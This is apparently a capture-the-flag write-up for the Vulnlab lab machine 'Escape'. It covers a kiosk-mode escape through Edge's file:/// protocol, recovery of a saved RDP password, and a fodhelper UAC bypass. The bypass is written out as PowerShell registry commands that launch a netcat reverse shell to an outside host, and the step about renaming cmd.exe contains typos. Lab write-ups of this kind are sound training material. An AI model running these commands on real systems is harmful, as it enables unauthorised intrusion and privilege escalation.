Vulnlab — Escape

ARZ101
5 min readFeb 24, 2024

Escape, an easy rated machine involved having windows running kiosk mode with only RDP service running, bypassing kiosk by using microsoft edge to enumerate the file system with the file:/// protocol to read files, from where we can find profiles.xml having the encrypted RDP password for admin user which can recovered through BulletsPassView and then escalating through User Account Control (UAC).

PORT     STATE SERVICE       VERSION                            
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-02-23T17:04:09+00:00; +35s from scanner time.
| ssl-cert: Subject: commonName=Escape
| Issuer: commonName=Escape
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption

From the scan we only have one port open which is RDP, on attempting login it’s going to ask for credentials which we don’t currently know

What if we try to see the login GUI, this can be done by disabling NLA

xfreerdp /v:10.10.73.33 -sec-nla

With this username, we’ll be able to login

But we are only limited to just see this screen, meaning that we are in Kisok mode

Pressing the start button and using cmd or any other application didn’t worked as it was restricted

We can however use Microsoft Edge and using `file` protocol, we can access the file system

From _admin we can find an interesting file profile.xml having some encrypted password

I tried looking for resources to decrypt this password but there wasn’t any tool to do that, we do have a tool called BulletsPassView which can reveal the passwords masked in bullets, on windows machine import the xml file using Remote Desktop Plus

And edit the profile, which will allow us to view the information in the profile, after that run bulletview, we’ll get the plain text password

However, when logging to RDP with these credentials it’s not going to allow that

This translates to:

To log in remotely, you must have permission to log in through Remote Desktop Services. By default, members of the Principle Desktop Users group have this right. If your current user group does not have this permission, or if this permission has been removed from the Principle Desk user group, you must be granted this permission manually

So the workaround is to spawn a shell through kiosk user and then use runas to switch user, to do that we’ll need to first find a way to spawn cmd and this can be done by copying cmd.exe in the directory where we have permission and rename it to msedege.exe as that's the only executable allowed in this kiosk mode

file:///C:/Windows/System32/cmd.exe

Now using runas

runas /user:Escape\admin cmd

We can see here this is in administrators group but with medium mandatory level which means we have to do UAC bypass here

New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "C:\Users\admin\Desktop\nc.exe 10.8.0.136 2222 -e powershell.exe" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden

We’ll receive a reverse shell with admin with all privileges.

But this shell didn’t last long and got terminated, not sure why but I wasn’t able to trigger it again as whenever I tried setting the property value it terminated powershell process

Since we already have GUI we can just use Start-Process powershell -Verb runAs (which I didn't know we could do that) which will prompt for running powershell with administrative privileges

Having these privileges back again we are basically a local admin on the machine.

References

--

--